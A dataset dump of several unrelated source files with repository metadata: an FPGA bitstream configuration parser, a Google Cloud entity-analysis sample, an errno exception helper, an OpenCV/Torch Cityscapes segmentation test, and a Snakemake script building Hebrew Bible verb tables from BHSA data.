"word_count": word_count
}
def parse_command(self, word):
return cmd_reg_codes[word]
def parse_cor1(self, word):
return word
def parse_cor2(self, word):
return word
def parse_ctl(self, word):
dec = (word >> 6) & 1
sb = (word >> 4) & 3
p = (word >> 3) & 1
efuse = (word >> 2) & 1
crc = (word >> 1) & 1
return {
"decryption": dec,
"security bits": sb,
"pesist": p,
"use efuse": efuse,
"crc extstat disable": crc
}
def parse_cclk_freq(self, word):
ext_mclk = (word >> 14) & 1
mclk_freq = word & 0x3FF
return (ext_mclk, mclk_freq)
def parse_pwrdn(self, word):
en_eyes = (word >> 14) & 1
filter_b = (word >> 5) & 1
en_pgsr = (word >> 4) & 1
en_pwrdn = (word >> 2) & 1
keep_sclk = word & 1
return {
"en_eyes": en_eyes,
"filter_b": filter_b,
"en_pgsr": en_pgsr,
"en_pwrdn": en_pwrdn,
"keep_sclk": keep_sclk
}
def parse_eye_mask(self, word):
return word & 0xFF
def parse_hc_opt(self, word):
return (word >> 6) & 1
def parse_cwdt(self, word):
return word
def parse_pu_gwe(self, word):
return word & 0x3FF
def parse_pu_gts(self, word):
return word & 0x3FF
def parse_mode(self, word):
new_mode = (word >> 13) & 0x1
buswidth = (word >> 11) & 0x3
bootmode = (word >> 8) & 0x7
bootvsel = word & 0xFF
return {
"new_mode": new_mode,
"buswidth": buswidth,
"bootmode": bootmode,
"bootvsel": bootvsel
}
def parse_seu(self, word):
seu_freq = (word >> 4) & 0x3FF
seu_run_on_err = (word >> 3) & 0x1
glut_mask = (word >> 1) & 0x1
seu_enable = word & 0x1
return {
"seu_freq": seu_freq,
"seu_run_on_err": seu_run_on_err,
"glut_mask": glut_mask,
"seu_enable": seu_enable
}
def parse_reg(self, reg_addr, word, payload_len, verbose):
reg = conf_regs[reg_addr]
if reg == "CMD":
command = self.parse_command(word)
if verbose:
print("Command: {}\n".format(command))
elif reg == "FLR":
frame_length = word
if verbose:
print("Frame length: {}\n".format(frame_length))
elif reg == "COR1":
conf_options = self.parse_cor1(word)
if verbose:
print("COR1 options: {}\n".format(conf_options))
elif reg == "COR2":
conf_options = self.parse_cor2(word)
if verbose:
print("COR2 options: {}\n".format(conf_options))
elif reg == "IDCODE":
assert payload_len < 3
if payload_len == 2:
self.idcode = word << 16
elif payload_len == 1:
self.idcode |= word
if verbose:
print("IDCODE: {}\n".format(hex(self.idcode)))
elif reg == "MASK":
mask = word
if verbose:
print("Mask value: {}\n".format(mask))
elif reg == "CTL":
ctl_options = self.parse_ctl(word)
if verbose:
print("CTL options: {}\n".format(ctl_options))
elif reg == "CCLK_FREQ":
cclk_freq_options = self.parse_cclk_freq(word)
if verbose:
print("CCLK_FREQ options: {}\n".format(cclk_freq_options))
elif reg == "PWRDN_REG":
suspend_reg_options = self.parse_pwrdn(word)
if verbose:
print("{} options: {}\n".format(reg, suspend_reg_options))
elif reg == "EYE_MASK":
eye_mask = self.parse_eye_mask(word)
if verbose:
print("{} options: {}\n".format(reg, eye_mask))
elif reg == "HC_OPT_REG":
hc_options = self.parse_hc_opt(word)
if verbose:
print("{} options: {}\n".format(reg, hc_options))
elif reg == "CWDT":
cwdt_options = self.parse_cwdt(word)
if verbose:
print("{} options: {}\n".format(reg, cwdt_options))
elif reg == "PU_GWE":
pu_gwe_sequence = self.parse_pu_gwe(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gwe_sequence))
elif reg == "PU_GTS":
pu_gts_sequence = self.parse_pu_gts(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gts_sequence))
elif reg == "MODE_REG":
mode_options = self.parse_mode(word)
if verbose:
print("{} options: {}\n".format(reg, mode_options))
elif reg == "GENERAL1" or reg == "GENERAL2" \
or reg == "GENERAL3" or reg == "GENERAL4" \
or reg == "GENERAL5":
general_options = word
if verbose:
print("{} options: {}\n".format(reg, general_options))
elif reg == "SEU_OPT":
seu_options = self.parse_seu(word)
if verbose:
print("{} options: {}\n".format(reg, seu_options))
elif reg == "EXP_SIGN":
if payload_len == 2:
self.exp_sign = word << 16
elif payload_len == 1:
self.exp_sign |= word
if verbose:
print("{}: {}\n".format(reg, self.exp_sign))
elif reg == "FAR_MAJ":
if payload_len == 2:
self.current_far_maj = word
elif payload_len == 1:
self.current_far_min = word
if verbose:
print(
"{}: {} FAR_MIN: {}\n".format(
reg, self.far_maj, self.far_min))
elif reg == "FDRI":
if self.fdri_in_progress:
self.frame_data.append(word)
if payload_len == 1:
self.fdri_in_progress = False
return 0
elif payload_len == 2:
self.curr_fdri_write_len = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_fdri_write_len |= word
self.fdri_in_progress = True
payload_len = self.curr_fdri_write_len + 2
if verbose:
print("{}: {}\n".format(reg, self.curr_fdri_write_len))
return payload_len
elif reg == "CRC":
if payload_len == 2:
self.curr_crc_check = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_crc_check |= word
if verbose:
print("{}: {}\n".format(reg, self.curr_crc_check))
payload_len -= 1
return payload_len
def write_frames_txt(self, file_name):
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("\nFrame {:4}\n".format(i // 65))
if i % 65 == 32:
frame_stream.write(
"\n#{:3}:{:6}\n".format(i % 65, hex(self.frame_data[i])))
else:
frame_stream.write(
"#{:3}:{:6},".format(i % 65, hex(self.frame_data[i])))
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def write_frames(self, file_name):
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("0x{:08x} ".format(i // 65))
frame_stream.write("0x{:04x}".format(self.frame_data[i]))
if i % 65 == 64:
frame_stream.write("\n")
elif i < len(self.frame_data) - 1:
frame_stream.write(",")
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def main(args):
verbose = not args.silent
bitstream = Bitstream(args.bitstream, verbose)
print("Frame data length: ", len(bitstream.frame_data))
if args.frames_out:
bitstream.write_frames(args.frames_out)
if verbose:
bitstream.write_frames_txt(args.frames_out + ".txt")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--bitstream', help='Input bitstream')
parser.add_argument('--frames_out', help='Output frames file')
parser.add_argument(
'--silent', help="Don't print analysis details", action='store_true')
args = parser.parse_args()
main(args)
| true
| true
|
f70b669356f7538feec576b7756d8e12924a4c88
| 2,257
|
py
|
Python
|
code-samples/language/v1/python/analyze_entities_request_language_entities_text.py
|
tswast/gapic-docs-samples
|
16976b148fb6eb53a8a685d475dcdb713ceb9e60
|
[
"Apache-2.0"
] | null | null | null |
code-samples/language/v1/python/analyze_entities_request_language_entities_text.py
|
tswast/gapic-docs-samples
|
16976b148fb6eb53a8a685d475dcdb713ceb9e60
|
[
"Apache-2.0"
] | null | null | null |
code-samples/language/v1/python/analyze_entities_request_language_entities_text.py
|
tswast/gapic-docs-samples
|
16976b148fb6eb53a8a685d475dcdb713ceb9e60
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# DO NOT EDIT! This is a generated sample ("Request", "language_entities_text")
# To install the latest published package dependency, execute the following:
# pip install google-cloud-language
import sys
# [START language_entities_text]
from google.cloud import language_v1
from google.cloud.language_v1 import enums
import six
def sample_analyze_entities(text_content):
"""Analyze entities in text"""
# [START language_entities_text_core]
client = language_v1.LanguageServiceClient()
# text_content = 'California is a state.'
if isinstance(text_content, six.binary_type):
text_content = text_content.decode('utf-8')
type_ = enums.Document.Type.PLAIN_TEXT
document = {'type': type_, 'content': text_content}
response = client.analyze_entities(document)
for entity in response.entities:
print('Entity name: {}'.format(entity.name))
print('Entity type: {}'.format(enums.Entity.Type(entity.type).name))
print('Entity salience score: {}'.format(entity.salience))
for mention in entity.mentions:
print('Mention: {}'.format(mention.text.content))
print('Mention type: {}'.format(
enums.EntityMention.Type(mention.type).name))
# [END language_entities_text_core]
# [END language_entities_text]
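# Example invocation (assumes google-cloud-language is installed and application
# default credentials are configured):
#   python analyze_entities_request_language_entities_text.py \
#       --text_content 'California is a state.'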
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--text_content', type=str, default='California is a state.')
args = parser.parse_args()
sample_analyze_entities(args.text_content)
if __name__ == '__main__':
main()
| 30.093333
| 80
| 0.712893
|
import sys
from google.cloud import language_v1
from google.cloud.language_v1 import enums
import six
def sample_analyze_entities(text_content):
client = language_v1.LanguageServiceClient()
if isinstance(text_content, six.binary_type):
text_content = text_content.decode('utf-8')
type_ = enums.Document.Type.PLAIN_TEXT
document = {'type': type_, 'content': text_content}
response = client.analyze_entities(document)
for entity in response.entities:
print('Entity name: {}'.format(entity.name))
print('Entity type: {}'.format(enums.Entity.Type(entity.type).name))
print('Entity salience score: {}'.format(entity.salience))
for mention in entity.mentions:
print('Mention: {}'.format(mention.text.content))
print('Mention type: {}'.format(
enums.EntityMention.Type(mention.type).name))
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--text_content', type=str, default='California is a state.')
args = parser.parse_args()
sample_analyze_entities(args.text_content)
if __name__ == '__main__':
main()
| true
| true
|
f70b671c221dafd94c7b178303d0f5d51c443463
| 2,771
|
py
|
Python
|
py/_error.py
|
kantai/passe-pypy-taint-tracking
|
b60a3663f8fe89892dc182c8497aab97e2e75d69
|
[
"MIT"
] | 2
|
2016-07-06T23:30:20.000Z
|
2017-05-30T15:59:31.000Z
|
py/_error.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | null | null | null |
py/_error.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | 2
|
2020-07-09T08:14:22.000Z
|
2021-01-15T18:01:25.000Z
|
"""
create errno-specific classes for IO or os calls.
"""
import sys, os, errno
class Error(EnvironmentError):
def __repr__(self):
return "%s.%s %r: %s " %(self.__class__.__module__,
self.__class__.__name__,
self.__class__.__doc__,
" ".join(map(str, self.args)),
#repr(self.args)
)
def __str__(self):
s = "[%s]: %s" %(self.__class__.__doc__,
" ".join(map(str, self.args)),
)
return s
_winerrnomap = {
2: errno.ENOENT,
3: errno.ENOENT,
17: errno.EEXIST,
    13: errno.EBUSY, # empty cd drive, but ENOMEDIUM seems unavailable
22: errno.ENOTDIR,
267: errno.ENOTDIR,
5: errno.EACCES, # anything better?
}
class ErrorMaker(object):
""" lazily provides Exception classes for each possible POSIX errno
    (as defined by the 'errno' module). All such instances
subclass EnvironmentError.
"""
Error = Error
_errno2class = {}
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
eno = getattr(errno, name)
cls = self._geterrnoclass(eno)
setattr(self, name, cls)
return cls
def _geterrnoclass(self, eno):
try:
return self._errno2class[eno]
except KeyError:
clsname = errno.errorcode.get(eno, "UnknownErrno%d" %(eno,))
errorcls = type(Error)(clsname, (Error,),
{'__module__':'py.error',
'__doc__': os.strerror(eno)})
self._errno2class[eno] = errorcls
return errorcls
def checked_call(self, func, *args, **kwargs):
""" call a function and raise an errno-exception if applicable. """
__tracebackhide__ = True
try:
return func(*args, **kwargs)
except self.Error:
raise
except EnvironmentError:
cls, value, tb = sys.exc_info()
if not hasattr(value, 'errno'):
raise
__tracebackhide__ = False
errno = value.errno
try:
if not isinstance(value, WindowsError):
raise NameError
except NameError:
# we are not on Windows, or we got a proper OSError
cls = self._geterrnoclass(errno)
else:
try:
cls = self._geterrnoclass(_winerrnomap[errno])
except KeyError:
raise value
raise cls("%s%r" % (func.__name__, args))
__tracebackhide__ = True
error = ErrorMaker()
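# Illustrative usage: error.checked_call(os.remove, 'missing-file') raises the
# errno-specific error.ENOENT instead of a bare EnvironmentError.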
| 31.850575
| 75
| 0.517864
|
import sys, os, errno
class Error(EnvironmentError):
def __repr__(self):
return "%s.%s %r: %s " %(self.__class__.__module__,
self.__class__.__name__,
self.__class__.__doc__,
" ".join(map(str, self.args)),
)
def __str__(self):
s = "[%s]: %s" %(self.__class__.__doc__,
" ".join(map(str, self.args)),
)
return s
_winerrnomap = {
2: errno.ENOENT,
3: errno.ENOENT,
17: errno.EEXIST,
13: errno.EBUSY,
22: errno.ENOTDIR,
267: errno.ENOTDIR,
5: errno.EACCES,
}
class ErrorMaker(object):
Error = Error
_errno2class = {}
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
eno = getattr(errno, name)
cls = self._geterrnoclass(eno)
setattr(self, name, cls)
return cls
def _geterrnoclass(self, eno):
try:
return self._errno2class[eno]
except KeyError:
clsname = errno.errorcode.get(eno, "UnknownErrno%d" %(eno,))
errorcls = type(Error)(clsname, (Error,),
{'__module__':'py.error',
'__doc__': os.strerror(eno)})
self._errno2class[eno] = errorcls
return errorcls
def checked_call(self, func, *args, **kwargs):
__tracebackhide__ = True
try:
return func(*args, **kwargs)
except self.Error:
raise
except EnvironmentError:
cls, value, tb = sys.exc_info()
if not hasattr(value, 'errno'):
raise
__tracebackhide__ = False
errno = value.errno
try:
if not isinstance(value, WindowsError):
raise NameError
except NameError:
cls = self._geterrnoclass(errno)
else:
try:
cls = self._geterrnoclass(_winerrnomap[errno])
except KeyError:
raise value
raise cls("%s%r" % (func.__name__, args))
__tracebackhide__ = True
error = ErrorMaker()
| true
| true
|
f70b6764a0549b85ceff5a1d7d0f64159ca92887
| 4,806
|
py
|
Python
|
opencv/sources/modules/dnn/test/cityscapes_semsegm_test_enet.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
opencv/sources/modules/dnn/test/cityscapes_semsegm_test_enet.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
opencv/sources/modules/dnn/test/cityscapes_semsegm_test_enet.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import sys
import os
import fnmatch
import argparse
try:
import cv2 as cv
except ImportError:
raise ImportError('Can\'t find OpenCV Python module. If you\'ve built it from sources without installation, '
'configure environment variable PYTHONPATH to "opencv_build_dir/lib" directory (with "python3" subdirectory if required)')
try:
import torch
except ImportError:
raise ImportError('Can\'t find pytorch. Please install it by following instructions on the official site')
from torch.utils.serialization import load_lua
from pascal_semsegm_test_fcn import eval_segm_result, get_conf_mat, get_metrics, DatasetImageFetch, SemSegmEvaluation
from imagenet_cls_test_alexnet import Framework, DnnCaffeModel
class NormalizePreproc:
def __init__(self):
pass
@staticmethod
def process(img):
image_data = np.array(img).transpose(2, 0, 1).astype(np.float32)
image_data = np.expand_dims(image_data, 0)
image_data /= 255.0
return image_data
class CityscapesDataFetch(DatasetImageFetch):
img_dir = ''
segm_dir = ''
segm_files = []
colors = []
i = 0
def __init__(self, img_dir, segm_dir, preproc):
self.img_dir = img_dir
self.segm_dir = segm_dir
self.segm_files = sorted([img for img in self.locate('*_color.png', segm_dir)])
self.colors = self.get_colors()
self.data_prepoc = preproc
self.i = 0
@staticmethod
def get_colors():
result = []
colors_list = (
(0, 0, 0), (128, 64, 128), (244, 35, 232), (70, 70, 70), (102, 102, 156), (190, 153, 153), (153, 153, 153),
(250, 170, 30), (220, 220, 0), (107, 142, 35), (152, 251, 152), (70, 130, 180), (220, 20, 60), (255, 0, 0),
(0, 0, 142), (0, 0, 70), (0, 60, 100), (0, 80, 100), (0, 0, 230), (119, 11, 32))
for c in colors_list:
result.append(DatasetImageFetch.pix_to_c(c))
return result
def __iter__(self):
return self
def next(self):
if self.i < len(self.segm_files):
segm_file = self.segm_files[self.i]
segm = cv.imread(segm_file, cv.IMREAD_COLOR)[:, :, ::-1]
segm = cv.resize(segm, (1024, 512), interpolation=cv.INTER_NEAREST)
img_file = self.rreplace(self.img_dir + segm_file[len(self.segm_dir):], 'gtFine_color', 'leftImg8bit')
assert os.path.exists(img_file)
img = cv.imread(img_file, cv.IMREAD_COLOR)[:, :, ::-1]
img = cv.resize(img, (1024, 512))
self.i += 1
gt = self.color_to_gt(segm, self.colors)
img = self.data_prepoc.process(img)
return img, gt
else:
self.i = 0
raise StopIteration
def get_num_classes(self):
return len(self.colors)
@staticmethod
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
@staticmethod
def rreplace(s, old, new, occurrence=1):
li = s.rsplit(old, occurrence)
return new.join(li)
class TorchModel(Framework):
net = object
def __init__(self, model_file):
self.net = load_lua(model_file)
def get_name(self):
return 'Torch'
def get_output(self, input_blob):
tensor = torch.FloatTensor(input_blob)
out = self.net.forward(tensor).numpy()
return out
class DnnTorchModel(DnnCaffeModel):
net = cv.dnn.Net()
def __init__(self, model_file):
self.net = cv.dnn.readNetFromTorch(model_file)
def get_output(self, input_blob):
self.net.setBlob("", input_blob)
self.net.forward()
return self.net.getBlob(self.net.getLayerNames()[-1])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--imgs_dir", help="path to Cityscapes validation images dir, imgsfine/leftImg8bit/val")
parser.add_argument("--segm_dir", help="path to Cityscapes dir with segmentation, gtfine/gtFine/val")
parser.add_argument("--model", help="path to torch model, download it here: "
"https://www.dropbox.com/sh/dywzk3gyb12hpe5/AAD5YkUa8XgMpHs2gCRgmCVCa")
parser.add_argument("--log", help="path to logging file")
args = parser.parse_args()
prep = NormalizePreproc()
df = CityscapesDataFetch(args.imgs_dir, args.segm_dir, prep)
fw = [TorchModel(args.model),
DnnTorchModel(args.model)]
segm_eval = SemSegmEvaluation(args.log)
segm_eval.process(fw, df)
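# Illustrative usage (added sketch; not part of the original test script): the
# entry point above is driven entirely by the argparse flags it defines, so an
# invocation would look roughly like the command below -- every path here is a
# placeholder, not a path from the original repository.
#
#   python cityscapes_semsegm_test_enet.py \
#       --imgs_dir /data/cityscapes/imgsfine/leftImg8bit/val \
#       --segm_dir /data/cityscapes/gtfine/gtFine/val \
#       --model /models/enet-model.net \
#       --log enet_cityscapes.log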
| 34.085106
| 145
| 0.615689
|
import numpy as np
import sys
import os
import fnmatch
import argparse
try:
import cv2 as cv
except ImportError:
raise ImportError('Can\'t find OpenCV Python module. If you\'ve built it from sources without installation, '
'configure environment variable PYTHONPATH to "opencv_build_dir/lib" directory (with "python3" subdirectory if required)')
try:
import torch
except ImportError:
raise ImportError('Can\'t find pytorch. Please install it by following instructions on the official site')
from torch.utils.serialization import load_lua
from pascal_semsegm_test_fcn import eval_segm_result, get_conf_mat, get_metrics, DatasetImageFetch, SemSegmEvaluation
from imagenet_cls_test_alexnet import Framework, DnnCaffeModel
class NormalizePreproc:
def __init__(self):
pass
@staticmethod
def process(img):
image_data = np.array(img).transpose(2, 0, 1).astype(np.float32)
image_data = np.expand_dims(image_data, 0)
image_data /= 255.0
return image_data
class CityscapesDataFetch(DatasetImageFetch):
img_dir = ''
segm_dir = ''
segm_files = []
colors = []
i = 0
def __init__(self, img_dir, segm_dir, preproc):
self.img_dir = img_dir
self.segm_dir = segm_dir
self.segm_files = sorted([img for img in self.locate('*_color.png', segm_dir)])
self.colors = self.get_colors()
self.data_prepoc = preproc
self.i = 0
@staticmethod
def get_colors():
result = []
colors_list = (
(0, 0, 0), (128, 64, 128), (244, 35, 232), (70, 70, 70), (102, 102, 156), (190, 153, 153), (153, 153, 153),
(250, 170, 30), (220, 220, 0), (107, 142, 35), (152, 251, 152), (70, 130, 180), (220, 20, 60), (255, 0, 0),
(0, 0, 142), (0, 0, 70), (0, 60, 100), (0, 80, 100), (0, 0, 230), (119, 11, 32))
for c in colors_list:
result.append(DatasetImageFetch.pix_to_c(c))
return result
def __iter__(self):
return self
def next(self):
if self.i < len(self.segm_files):
segm_file = self.segm_files[self.i]
segm = cv.imread(segm_file, cv.IMREAD_COLOR)[:, :, ::-1]
segm = cv.resize(segm, (1024, 512), interpolation=cv.INTER_NEAREST)
img_file = self.rreplace(self.img_dir + segm_file[len(self.segm_dir):], 'gtFine_color', 'leftImg8bit')
assert os.path.exists(img_file)
img = cv.imread(img_file, cv.IMREAD_COLOR)[:, :, ::-1]
img = cv.resize(img, (1024, 512))
self.i += 1
gt = self.color_to_gt(segm, self.colors)
img = self.data_prepoc.process(img)
return img, gt
else:
self.i = 0
raise StopIteration
def get_num_classes(self):
return len(self.colors)
@staticmethod
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
@staticmethod
def rreplace(s, old, new, occurrence=1):
li = s.rsplit(old, occurrence)
return new.join(li)
class TorchModel(Framework):
net = object
def __init__(self, model_file):
self.net = load_lua(model_file)
def get_name(self):
return 'Torch'
def get_output(self, input_blob):
tensor = torch.FloatTensor(input_blob)
out = self.net.forward(tensor).numpy()
return out
class DnnTorchModel(DnnCaffeModel):
net = cv.dnn.Net()
def __init__(self, model_file):
self.net = cv.dnn.readNetFromTorch(model_file)
def get_output(self, input_blob):
self.net.setBlob("", input_blob)
self.net.forward()
return self.net.getBlob(self.net.getLayerNames()[-1])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--imgs_dir", help="path to Cityscapes validation images dir, imgsfine/leftImg8bit/val")
parser.add_argument("--segm_dir", help="path to Cityscapes dir with segmentation, gtfine/gtFine/val")
parser.add_argument("--model", help="path to torch model, download it here: "
"https://www.dropbox.com/sh/dywzk3gyb12hpe5/AAD5YkUa8XgMpHs2gCRgmCVCa")
parser.add_argument("--log", help="path to logging file")
args = parser.parse_args()
prep = NormalizePreproc()
df = CityscapesDataFetch(args.imgs_dir, args.segm_dir, prep)
fw = [TorchModel(args.model),
DnnTorchModel(args.model)]
segm_eval = SemSegmEvaluation(args.log)
segm_eval.process(fw, df)
| true
| true
|
f70b677ef4defae6580fc8ce081c318d2bf035c9
| 7,857
|
py
|
Python
|
workflow/scripts/hebrew/build_hebrew_tables.py
|
CambridgeSemiticsLab/translation_traditions_HB
|
8f2c4d263cc5dc1542184343a384b44bf705770d
|
[
"MIT"
] | 2
|
2020-11-30T06:34:10.000Z
|
2021-11-16T14:16:24.000Z
|
workflow/scripts/hebrew/build_hebrew_tables.py
|
CambridgeSemiticsLab/Gesenius_data
|
8f2c4d263cc5dc1542184343a384b44bf705770d
|
[
"MIT"
] | null | null | null |
workflow/scripts/hebrew/build_hebrew_tables.py
|
CambridgeSemiticsLab/Gesenius_data
|
8f2c4d263cc5dc1542184343a384b44bf705770d
|
[
"MIT"
] | null | null | null |
import re
import sys
import csv
import json
import pickle
import collections
from pathlib import Path
from tf.fabric import Fabric
from book_formats import get_book_maps, etcbc2sbl, etcbc2abbr
from verb_form import get_verbform, get_cl_verbform
from modify_domain import permissive_q
from synvar_carc import in_dep_calc as clause_relator
from modify_cltype import simplify_cl_type
from tag_args import clause_objects, get_loca_assocs, clause_locas, clause_time, clause_args
# NB: the working directory when this script is executed is
# /workflow; because we have some utilities that we want
# to run from the directory above, we need to append it to the path
sys.path.append('scripts')
from build_tables import build_sample_tables
# fire up Text-Fabric with BHSA data
TF = Fabric(snakemake.input['tf_mods'], silent='deep')
features = """
sp pdp vs vt ps gn nu
lex language gloss voc_lex voc_lex_utf8
function number label
typ code rela mother domain txt
genre
sense
nhead
funct_assoc
"""
bhsa = TF.load(features, silent='deep')
F, E, T, L, Fs, = bhsa.F, bhsa.E, bhsa.T, bhsa.L, bhsa.Fs
# load GBI Hebrew data
with open(snakemake.input.bhsa2gbi, 'rb') as infile:
bhsa2gbi = pickle.load(infile)
# preprocess data
bookmap = get_book_maps(bhsa)
loca_lexs = get_loca_assocs(bhsa)
def join_on(nodes, jchar='_', default=''):
"""Join words on a char and ensure they are pre/appended with that char.
The pre/appending provides easy-to-match word boundaries.
"""
joined_string = f'{jchar}'.join(nodes)
if not joined_string:
return default
else:
return f'{jchar}{joined_string}{jchar}'
def get_preceding_words(node, context='clause'):
"""Retrieves words from before a verb within a context"""
context_node = L.u(node, context)[0]
context_words = L.d(context_node, 'word')
prec_words = context_words[:context_words.index(node)]
return prec_words
def main_row(node):
"""Compile all relevant BHSA data for a given node."""
# data on this clause itself
book, chapter, verse = T.sectionFromNode(node)
booksbl = etcbc2sbl[book]
bookabbr = etcbc2abbr[book]
ref_string = f'{book} {chapter}:{verse}'
ref_sbl = f'{booksbl} {chapter}:{verse}'
ref_abbr = f'{bookabbr} {chapter}:{verse}'
verse_node = L.u(node, 'verse')[0]
clause_atom = L.u(node, 'clause_atom')[0]
clause = L.u(node, 'clause')[0]
sent = L.u(node, 'sentence')[0]
clause_type = F.typ.v(clause)
preceding_words = get_preceding_words(node)
prec_lexes = join_on((F.lex.v(w) for w in preceding_words), default='Ø')
prec_pos = join_on((F.pdp.v(w) for w in preceding_words), default='Ø')
domain2 = permissive_q(clause, bhsa)
verbform = get_verbform(node, bhsa, bhsa2gbi)
cl_type_simp = simplify_cl_type(clause_atom, prec_lexes, bhsa)
# work around for participle contexts without
# clause data
if verbform == 'ptcp' and clause_type != 'Ptcp':
        cl_args = None
        has_q = None
do_clause = False
else:
do_clause = True
cl_args = clause_args(node, bhsa)
has_q = ('Q' in cl_args) * 1 # look for question particles
cl_args = re.match('.*V', cl_args)[0] # NB ignore post-verbal arguments
# collect preceding particles only
particle_types = {'nega', 'advb', 'prep', 'conj', 'prde', 'prin', 'intj', 'inrg'}
prec_particles = join_on(
(F.lex.v(w) for w in preceding_words
if F.pdp.v(w) in particle_types)
, default='Ø')
null_string = ''
row_data = {
'bhsa_node': node,
'ref': ref_string,
'book': book,
'book_super': bookmap['super'].get(book, book),
'canon_part': bookmap['tripart'][book],
'period': bookmap['period'].get(book, ''),
'genre': F.genre.v(verse_node),
'domain2': domain2,
'text_full': F.g_word_utf8.v(node),
'text_plain': F.g_cons_utf8.v(node),
'lex': F.lex_utf8.v(node),
'lex_etcbc': F.lex.v(node),
'gloss': F.gloss.v(node),
'verb_form': verbform,
'stem': F.vs.v(node),
'person': F.ps.v(node),
'gender': F.gn.v(node),
'number': F.nu.v(node),
'valence': F.sense.v(node),
'clause_atom': T.text(clause_atom),
'clause': T.text(clause),
'verse': T.text(verse_node),
'sentence': T.text(sent),
'txt_type': F.txt.v(clause),
'clause_type': clause_type,
'cltype_simp': cl_type_simp,
'clause_rela': clause_relator(clause, bhsa),
'cl_args': cl_args,
'is_question': has_q,
'prec_lexes': prec_lexes,
'prec_pos': prec_pos,
'prec_part': prec_particles,
'ref_sbl': ref_sbl,
'ref_abbr': ref_abbr,
}
if do_clause:
# provide clause argument data
# objects
row_data.update(
clause_objects(node, clause_atom, clause, bhsa)
)
# locatives
row_data.update(
clause_locas(node, loca_lexs, bhsa)
)
row_data.update(
clause_time(node, bhsa)
)
# convert to boolean 0 or 1 to avoid indexing
# pivot tables with booleans
row_data['has_objc'] = 1 * row_data['has_objc']
row_data['has_loca'] = 1 * row_data['has_loca']
return row_data
def nearby_clatom_data(clatom_lookup, starting_clatom):
"""Retrieve data on a nearby clause_atom, if it exists
Args:
clatom_lookup: iterable of clause_atom nodes or empty
Returns:
dict of data on the first clause_atom in the lookup, if
one was found, else an empty dict
"""
rel_dat = {
'clause':'', 'cl_atom': '', 'clause_atom':'',
'rela': '', 'domain2': '', 'verbtype': '',
'type': '', 'verb_ps': '', 'verb_lex': '',
'verbplain': '', 'intertext': ''
}
    # retrieve data on the first clause in the lookup, if there is one
if clatom_lookup:
cl_atom = rel_dat['cl_atom'] = clatom_lookup[0]
cl = L.u(cl_atom, 'clause')[0]
verb = next((w for w in L.d(cl_atom, 'word') if F.pdp.v(w) == 'verb'), 0)
rel_dat['verb_lex'] = F.lex.v(verb)
rel_dat['verb_ps'] = F.ps.v(verb)
rel_dat['type'] = F.typ.v(cl_atom)
rel_dat['verbplain'] = F.g_cons_utf8.v(verb)
rel_dat['verbtype'] = get_cl_verbform(cl_atom, bhsa, bhsa2gbi)
rel_dat['domain2'] = permissive_q(cl, bhsa) # domain with permissive Q
rel_dat['rela'] = clause_relator(cl, bhsa)
rel_dat['clause_atom'] = T.text(cl_atom)
rel_dat['clause'] = T.text(cl)
# capture text in between starting node and this one
if cl_atom - starting_clatom <= 3:
if cl_atom < starting_clatom:
interm_clatoms = list(range(cl_atom, starting_clatom))
else:
interm_clatoms = list(range(starting_clatom+1, cl_atom+1))
for cl in interm_clatoms:
rel_dat['intertext'] += T.text(cl)
return rel_dat
def clrela_row(node):
"""Retrieve data on related clauses."""
clause_atom = L.u(node, 'clause_atom')[0]
# build data on the mother/daughter clause
relas = {
'mother': nearby_clatom_data(E.mother.f(clause_atom), clause_atom),
'daught': nearby_clatom_data(E.mother.t(clause_atom), clause_atom)
}
row_data = {'bhsa_node': node}
for relcl, rcdata in relas.items():
row_data.update({
f'{relcl}_{k}': rcdata[k] for k in rcdata
})
return row_data
rowmakers = [main_row, clrela_row]
build_sample_tables(
rowmakers,
snakemake.input.sample,
snakemake.output
)
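# Illustrative sketch (added; not part of the original workflow): this module is
# meant to run as a Snakemake `script:`, reading its inputs and outputs from the
# injected `snakemake` object rather than from the command line. A driving rule
# might look roughly like the fragment below; the rule name and file paths are
# assumptions, and only the input keys (tf_mods, bhsa2gbi, sample) are taken from
# the code above.
#
#   rule build_hebrew_tables:
#       input:
#           tf_mods=..., bhsa2gbi=..., sample=...
#       output:
#           ...
#       script:
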